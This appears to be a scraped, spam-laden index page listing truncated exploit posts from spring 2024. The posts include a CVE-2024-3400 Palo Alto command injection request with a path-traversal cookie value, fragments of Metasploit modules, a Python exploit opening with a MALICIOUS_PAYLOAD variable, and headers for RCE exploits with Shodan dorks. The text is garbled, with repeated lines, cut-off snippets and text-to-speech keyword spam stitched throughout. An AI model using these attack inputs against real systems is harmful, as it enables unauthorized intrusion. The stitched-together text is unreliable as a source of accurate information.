Palo Alto OS Command Injection Proof Of Concept
April 17th, 2024 | π
iSpeechThis is a scanning script to validate vulnerable Palo Alto OS systems for the recent zero day command injection vulnerability.
April 17th, 2024 | π
iSpeechThis is a scanning script to validate vulnerable Palo Alto OS systems for the recent zero day command injection vulnerability.
April 17th, 2024 | π
iSpeech.org # CVE-2024-3400 CVE-2024-3400 Palo Alto OS Command Injection send this HTTP request: ```http POST /ssl-vpn/hipreport.esp HTTP/1.1Host: 127.0.0.1Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;Connection: closeContent-Type:
April 15th, 2024 | π
iSpeechGLPI versions 10.x.x suffers from a remote command execution vulnerability via the shell commands plugin. Source link
April 12th, 2024 | π
https://www.ispeech.org*] # Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)# Description:# The Ray Project dashboard contains a CPU profiling
April 11th, 2024 | π
german tts import requestsimport argparseimport zipfileimport osimport sys RED = '\03391m'GREEN = '\03392m'YELLOW = '\03393m'RESET = '\0330m'ORANGE = '\03338;5;208m' MALICIOUS_PAYLOAD
April 10th, 2024 | π
iSpeech # Exploit Title: CHAOS RAT v5.0.1 RCE# Date: 2024-04-05# Exploit Author: @_chebuya# Software Link: https://github.com/tiagorlampert/CHAOS# Version: v5.0.1 # Tested
April 3rd, 2024 | π
uk text to speech Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/0e6e40aad3e8d46e3c0c26ccc6ab94b3.txtContact: malvuln13@gmail.comMedia: twitter.com/malvuln Threat: Backdoor.Win32.Agent.ju
March 30th, 2024 | π
https://www.ispeech.org/text.to.speech Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Command InjectionDate: 03/28/2024Exploit Author: Chokri HammediVendor Homepage: https://flarum.org/Software Link: https://github.com/FriendsOfFlarum/pretty-mailVersion:
March 29th, 2024 | π
https://www.ispeech.org/text.to.speech ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework## require 'zlib' class MetasploitModule < Msf::Exploit::RemoteRank = GoodRankinginclude Msf::Exploit::Remote::HttpClientprepend Msf::Exploit::Remote::AutoCheck
March 28th, 2024 | π
https://www.ispeech.orgThe server in Circontrol Raption versions through 5.11.2 has a pre-authentication stack-based buffer overflow that can be exploited to gain
March 27th, 2024 | π
TTS ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework## require 'securerandom' class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRanking include Msf::Exploit::Remote::HttpClientinclude
March 21st, 2024 | π
iSpeech ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework## class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRanking include Msf::Exploit::Remote::HttpClientprepend Msf::Exploit::Remote::AutoCheck def
March 18th, 2024 | π
Text to Speech # Exploit Title: Nokia BMC Log Scanner Remote Code Execution# Google Dork: N/A# Date: November 29, 2023#
March 15th, 2024 | π
https://www.ispeech.org #- Exploit Title: SolarView Compact 6.00 - Command Injection#- Shodan Dork: http.html:"solarview compact"#- Exploit Author: ByteHunter#- Email: 0xByteHunter@proton.me#- Version:
Gloss